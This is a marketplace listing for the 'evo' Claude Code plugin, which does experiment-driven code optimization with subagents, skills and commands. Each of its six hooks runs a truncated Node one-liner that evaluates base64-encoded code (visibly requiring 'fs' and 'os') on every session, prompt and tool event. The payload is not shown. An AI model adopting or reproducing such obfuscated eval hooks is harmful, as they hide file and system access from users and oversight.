evo-hq-evo
01Plugin Claude Code
Plugin marketplace listing 1 plugin: evo.
Plugin Claude Code
Plugin marketplace listing 1 plugin: evo.
Plugin Claude Code
Structured experiment-driven code optimization using tree search and parallel subagents.
Agent
Reviews an evo benchmark in two modes. mode=audit -- pre-flight harness audit before the first run (per-task instrumentation, leakage, gates, plumbing); read-only. mode=review-experiment -- post-commit per-task failure analysis for a specific experiment; reads per-task traces and the eval-runner log, writes per-task…
Agent
Generates ranked experiment proposals for the evo orchestrator. Runs ONE brief per invocation (failureanalysis, literature, or frontierextrapolation) and appends proposals as JSONL lines to a shared file the orchestrator reconciles. Use literature for web/arXiv/HF/GitHub research (the only brief that needs network).…
Agent
Read-only audit of one evo experiment for design-time cheating (pre-phase) or result-time validity (post-phase). Catches test-set leakage in training data, subsetted eval commands, missing gates for new artifacts, generic hypotheses, cache short-circuits, fake artifacts, and score-reproducibility failures. Returns…
Command
Discover what to optimize and initialize an evo workspace.
Command
Run the evo autoresearch optimization loop.
Hook
Runs before the agent uses a tool, running node -e "eval(Buffer.from('Y29uc3QgZnM9cmVxdWlyZSgnZnMnKSxvc. From evo-hq/evo.
Hook
Runs after a tool call finishes for Bash tool calls, running node -e "eval(Buffer.from('Y29uc3QgZnM9cmVxdWlyZSgnZnMnKSxvc (2 commands). From evo-hq/evo.
Hook
Runs when you submit a prompt, before the agent sees it, running node -e "eval(Buffer.from('Y29uc3QgZnM9cmVxdWlyZSgnZnMnKSxvc. From evo-hq/evo.
Hook
Runs when a session starts, running node -e "eval(Buffer.from('Y29uc3QgZnM9cmVxdWlyZSgnZnMnKSxvc. From evo-hq/evo.
Hook
Runs when the agent finishes a response, running node -e "eval(Buffer.from('Y29uc3QgZnM9cmVxdWlyZSgnZnMnKSxvc. From evo-hq/evo.
Hook
Runs when a subagent finishes, running node -e "eval(Buffer.from('Y29uc3QgZnM9cmVxdWlyZSgnZnMnKSxvc. From evo-hq/evo.
Skill Claude CodeCodex
Initialize evo for the current repository by exploring the codebase, proposing unexplored optimization dimensions, constructing the benchmark inside a baseline worktree, and running the first experiment. Use when the user invokes /evo:discover, mentions setting up evo, wants to instrument a codebase for autonomous…
Skill Claude CodeCodex
Non-user-invocable provider/setup reference for evo backend switching, prerequisite checks, and auth/install guidance.
Skill Claude CodeCodex
Drive structured autoresearch iteration after evo:discover and the baseline commit. Use when the user invokes /evo:optimize or asks to try ideas, try variants, run experiments, use available GPUs, improve the current best/frontier, continue an evo search, or compare candidate changes in an evo workspace. The…
Skill Claude CodeCodex
Read-only evo run reporting. Use when the user invokes /evo:report, asks what happened overnight, asks what improved recently, asks for the best/frontier candidates, asks for a quick score chart without opening the dashboard, or wants the scatter plot in chat output. Never run benchmarks, gates, Slurm commands, evo…
Skill Claude CodeCodex
Land the winning experiment from an evo run as a clean, mergeable change -- open a PR when the repo has a remote, otherwise merge into the working branch. Distills the best-scoring experiment down to the minimal diff that reproduces its behaviour, shaped for the qualities a maintainer merges on (scope discipline, test…
Skill Claude CodeCodex
Protocol that evo optimization subagents follow when dispatched from /optimize. Auto-loaded by spawned subagents via their host's skill loader. The orchestrator may also invoke this skill to understand the brief shape its dispatched subagents expect + what they're required to emit -- useful when writing briefs or…
Skill Claude CodeCodex
This skill should be used when picking or diagnosing a training move (SFT, LoRA, DPO/KTO/ORPO, RFT, GRPO/PPO/RLOO, RLHF), or when the user mentions fine-tuning, post-training, training recipe, reward design, or weight updates. Decision tree by reward shape, smoke-run gate, three failure diagnostics, five…